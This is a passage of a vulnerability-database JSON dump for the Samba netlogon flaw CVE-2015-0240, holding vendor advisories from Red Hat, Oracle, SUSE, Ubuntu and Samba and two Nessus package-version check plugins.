(CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2016-09-04T02:14:30", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0255", "href": "https://access.redhat.com/errata/RHSA-2015:0255", "type": "redhat", "title": "(RHSA-2015:0255) Critical: samba4 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2015-04-24T14:17:48", "published": "2015-02-23T05:00:00", "id": "RHSA-2015:0257", "href": "https://access.redhat.com/errata/RHSA-2015:0257", "type": "redhat", "title": "(RHSA-2015:0257) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "unix", "description": "[3.6.23-14.0.1]\n- Remove use-after-free talloc_tos() inlined function problem (John Haxby) [orabug 18253258]\n[3.6.23-14]\n- related: #1191338 - Update patchset for CVE-2015-0240.\n[3.6.23-13]\n- resolves: #1191338 - CVE-2015-0240: RCE in netlogon.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "ELSA-2015-0251", "href": "http://linux.oracle.com/errata/ELSA-2015-0251.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:51", "bulletinFamily": "unix", "description": "[4.1.1-38]\n- resolves: #1194132 - CVE-2015-0240: RCE in netlogon server.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "ELSA-2015-0252", "href": "http://linux.oracle.com/errata/ELSA-2015-0252.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:24", "bulletinFamily": "unix", "description": "[3.6.23-9]\n- related: #1191608 - Update patchset for CVE-2015-0240.\n[3.6.23-8]\n- resolves: #1191608 - CVE-2015-0240: RCE in netlogon.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "ELSA-2015-0249", "href": "http://linux.oracle.com/errata/ELSA-2015-0249.html", "title": "samba3x security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "unix", "description": "[4.0.0-66.rc4]\n- related: #1191387 - Update patchset for CVE-2015-0240.\n[4.0.0-65.rc4]\n- resolves: #1191387 - CVE-2015-0240: RCE in netlogon.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "ELSA-2015-0250", "href": "http://linux.oracle.com/errata/ELSA-2015-0250.html", "title": "samba4 security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "samba": [{"lastseen": "2019-05-29T19:19:11", "bulletinFamily": "software", "description": "All versions of Samba from 3.5.0 to 4.2.0rc4 are vulnerable to an unexpected code execution vulnerability in the smbd file server daemon.\nA malicious client could send packets that may set up the stack in such a way that the freeing of memory in a subsequent anonymous netlogon packet could allow execution of arbitrary code. This code would execute with root privileges.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "SAMBA:CVE-2015-0240", "href": "https://www.samba.org/samba/security/CVE-2015-0240.html", "title": "Unexpected code execution in smbd. ", "type": "samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "description": "Samba has been updated to fix one security issue:\n\n * CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n Additionally, these non-security issues have been fixed:\n\n * Realign the winbind request structure following\n require_membership_of field expansion (bnc#913001).\n * Reuse connections derived from DFS referrals (bso#10123,\n fate#316512).\n * Set domain/workgroup based on authentication callback value\n (bso#11059).\n * Fix spoolss error response marshalling (bso#10984).\n * Fix spoolss EnumJobs and GetJob responses (bso#10905, bnc#898031).\n * Fix handling of bad EnumJobs levels (bso#10898).\n * Fix small memory-leak in the background print process; (bnc#899558).\n * Prune idle or hung connections older than "winbind request timeout"\n (bso#3204, bnc#872912).\n\n Security Issues:\n\n * CVE-2015-0240\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0240\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0240</a>>\n\n", "modified": "2015-02-25T08:09:00", "published": "2015-02-25T08:09:00", "id": "SUSE-SU-2015:0371-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00030.html", "type": "suse", "title": "Security update for Samba (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:32:46", "bulletinFamily": "unix", "description": "Samba has been updated to fix one security issue:\n\n * CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n Additionally, these non-security issues have been fixed:\n\n * Realign the winbind request structure following\n require_membership_of field expansion (bnc#913001).\n * Reuse connections derived from DFS referrals (bso#10123,\n fate#316512).\n * Set domain/workgroup based on authentication callback value\n (bso#11059).\n * Fix spoolss error response marshalling (bso#10984).\n * Fix spoolss EnumJobs and GetJob responses (bso#10905, bnc#898031).\n * Fix handling of bad EnumJobs levels (bso#10898).\n * Fix small memory-leak in the background print process (bnc#899558).\n * Prune idle or hung connections older than "winbind request timeout"\n (bso#3204, bnc#872912).\n * Build: disable mmap on s390 systems (bnc#886193, bnc#882356).\n * Only update the printer share inventory when needed (bnc#883870).\n * Avoid double-free in get_print_db_byname (bso#10699).\n\n Security Issues:\n\n * CVE-2015-0240\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0240\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0240</a>>\n\n", "modified": "2015-02-27T11:04:55", "published": "2015-02-27T11:04:55", "id": "SUSE-SU-2015:0386-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00035.html", "type": "suse", "title": "Security update for Samba (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:27:22", "bulletinFamily": "unix", "description": "samba was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n These non-security issues were fixed:\n - Fix vfs_snapper DBus string handling (bso#11055, bnc#913238).\n - Fix libsmbclient DFS referral handling.\n + Reuse connections derived from DFS referrals (bso#10123).\n + Set domain/workgroup based on authentication callback value\n (bso#11059).\n - pam_winbind: Fix warn_pwd_expire implementation (bso#9056).\n - nsswitch: Fix soname of linux nss_*.so.2 modules (bso#9299).\n - Fix profiles tool (bso#9629).\n - s3-lib: Do not require a password with --use-ccache (bso#10279).\n - s4:dsdb/rootdse: Expand extended dn values with the AS_SYSTEM control\n (bso#10949).\n - s4-rpc: dnsserver: Fix enumeration of IPv4 and IPv6 addresses\n (bso#10952).\n - s3:smb2_server: Allow reauthentication without signing (bso#10958).\n - s3-smbclient: Return success if we listed the shares (bso#10960).\n - s3-smbstatus: Fix exit code of profile output (bso#10961).\n - libcli: SMB2: Pure SMB2-only negprot fix to make us behave as a Windows\n client does (bso#10966).\n - s3: smbd/modules: Fix *allocate* calls to follow POSIX error return\n convention (bso#10982).\n - Fix 'domain join' by adding 'drsuapi.DsBindInfoFallBack' attribute\n 'supported_extensions' (bso#11006).\n - idl:drsuapi: Manage all possible lengths of drsuapi_DsBindInfo\n (bso#11006).\n - winbind: Retry LogonControl RPC in ping-dc after session expiration\n (bso#11034).\n - yast2-samba-client should be able to specify osName and osVer on AD\n domain join (bnc#873922).\n - Lookup FSRVP share snums at runtime rather than storing them\n persistently (bnc#908627).\n - Specify soft dependency for network-online.target in Winbind systemd\n service file (bnc#889175).\n - Fix spoolss error response marshalling; (bso#10984).\n - pidl/wscript: Remove --with-perl-* options; revert buildtools/wafadmin/\n Tools/perl.py back to upstream state (bso#10472).\n - s4-dns: Add support for BIND 9.10 (bso#10620).\n - nmbd fails to accept "--piddir" option; (bso#10711).\n - S3: source3/smbd/process.c::srv_send_smb() returns true on the error\n path (bso#10880).\n - vfs_glusterfs: Remove "integer fd" code and store the glfs pointers\n (bso#10889).\n - s3-nmbd: Fix netbios name truncation (bso#10896).\n - spoolss: Fix handling of bad EnumJobs levels (bso#10898).\n - spoolss: Fix jobid in level 3 EnumJobs response; (bso#10905).\n - s3: nmbd: Ensure NetBIOS names are only 15 characters stored;\n (bso#10920).\n - s3:smbd: Fix file corruption using "write cache size != 0"; (bso#10921).\n - pdb_tdb: Fix a TALLOC/SAFE_FREE mixup; (bso#10932).\n - s3-keytab: Fix keytab array NULL termination; (bso#10933).\n - Cleanup add_string_to_array and usage; (bso#10942).\n - Remove and cleanup shares and registry state associated with externally\n deleted snaphots exposed as shadow copies; (bnc#876312).\n - Use the upstream tar ball, as signature verification is now able to\n handle compressed archives.\n - Fix leak when closing file descriptor returned from dirfd; (bso#10918).\n - Fix spoolss EnumJobs and GetJob responses; (bso#10905); (bnc#898031).\n + Fix handling of bad EnumJobs levels; (bso#10898).\n - Remove dependency on gpg-offline as signature checking is implemented in\n the source validator.\n - s3-libnet: Add libnet_join_get_machine_spns(); (bso#9984).\n - s3-libnet: Make sure we do not overwrite precreated SPNs; (bso#9984).\n - s3-libads: Add all machine account principals to the keytab; (bso#9985).\n - s3: winbindd: Old NT Domain code sets struct winbind_domain->alt_name to\n be NULL. Ensure this is safe with modern AD-DCs; (bso#10717).\n - Fix unstrcpy; (bso#10735).\n - pthreadpool: Slightly serialize jobs; (bso#10779).\n - s3: smbd: streams - Ensure share mode validation ignores internal opens\n (op_mid == 0); (bso#10797).\n - s3: smbd:open_file: Open logic fix; Use a more natural check;\n (bso#10809).\n - vfs_media_harmony: Fix a crash bug; (bso#10813).\n - docs: Mention incompatibility between kernel oplocks and streams_xattr;\n (bso#10814).\n - nmbd: Send waiting status to systemd; (bso#10816).\n - libcli: Fix a segfault calling smbXcli_req_set_pending() on NULL;\n (bso#10817).\n - nsswitch: Skip groups we were not able to map; (bso#10824).\n - s3-winbindd: Use correct realm for trusted domains in idmap child;\n (bso#10826).\n - s3: nmbd: Ensure the main nmbd process doesn't create zombies;\n (bso#10830).\n - s3: lib: Signal handling - ensure smbrun and change password code save\n and restore existing SIGCHLD handlers; (bso#10831).\n - idmap_rfc2307: Fix a crash after connection problem to DC; (bso#10837).\n - s3-winbindd: Do not use domain SID from LookupSids for Sids2UnixIDs\n call; (bso#10838).\n - s3: smb2cli: Query info return length check was reversed; (bso#10848).\n - registry: Don't leave dangling transactions; (bso#10860).\n - Prune idle or hung connections older than "winbind request timeout";\n (bso#3204); (bnc#872912).\n\n", "modified": "2015-02-23T16:05:05", "published": "2015-02-23T16:05:05", "id": "SUSE-SU-2015:0353-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00028.html", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:39", "bulletinFamily": "unix", "description": "samba was updated to fix two security issues.\n\n These security issues were fixed:\n - CVE-2015-0240: Ensure we don't call talloc_free on an uninitialized\n pointer (bnc#917376).\n - CVE-2014-8143: Samba 4.0.x before 4.0.24, 4.1.x before 4.1.16, and 4.2.x\n before 4.2rc4, when an Active Directory Domain Controller (AD DC) is\n configured, allowed remote authenticated users to set the LDB\n userAccountControl UF_SERVER_TRUST_ACCOUNT bit, and consequently gain\n privileges, by leveraging delegation of authority for user-account or\n computer-account creation (bnc#914279).\n\n Several non-security issues were fixed, please refer to the changes file.\n\n", "modified": "2015-02-25T15:07:13", "published": "2015-02-25T15:07:13", "id": "OPENSUSE-SU-2015:0375-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00031.html", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:23:14", "bulletinFamily": "unix", "description": "Richard van Eeden discovered that the Samba smbd file services incorrectly handled memory. A remote attacker could use this issue to possibly execute arbitrary code with root privileges.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "USN-2508-1", "href": "https://usn.ubuntu.com/2508-1/", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:55:19", "bulletinFamily": "scanner", "description": "Updated samba packages fix security vulnerabilities :\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2015-081.NASL", "href": "https://www.tenable.com/plugins/nessus/82334", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : samba (MDVSA-2015:081)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:081. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82334);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"MDVSA\", value:\"2015:081\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba (MDVSA-2015:081)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages fix security vulnerabilities :\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-fsecure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-sophos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64netapi0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nss_wins-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-client-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-common-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"samba-doc-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-server-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-swat-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-clamav-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-fsecure-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-sophos-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-winbind-3.6.25-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:15:26", "bulletinFamily": "scanner", "description": "Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.", "modified": "2019-11-02T00:00:00", "id": "CENTOS_RHSA-2015-0252.NASL", "href": "https://www.tenable.com/plugins/nessus/81443", "published": "2015-02-24T00:00:00", "title": "CentOS 7 : samba (CESA-2015:0252)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0252 and \n# CentOS Errata and Security Advisory 2015:0252 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81443);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/02 15:30:19\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"RHSA\", value:\"2015:0252\");\n\n script_name(english:\"CentOS 7 : samba (CESA-2015:0252)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-February/020945.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5861a3f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 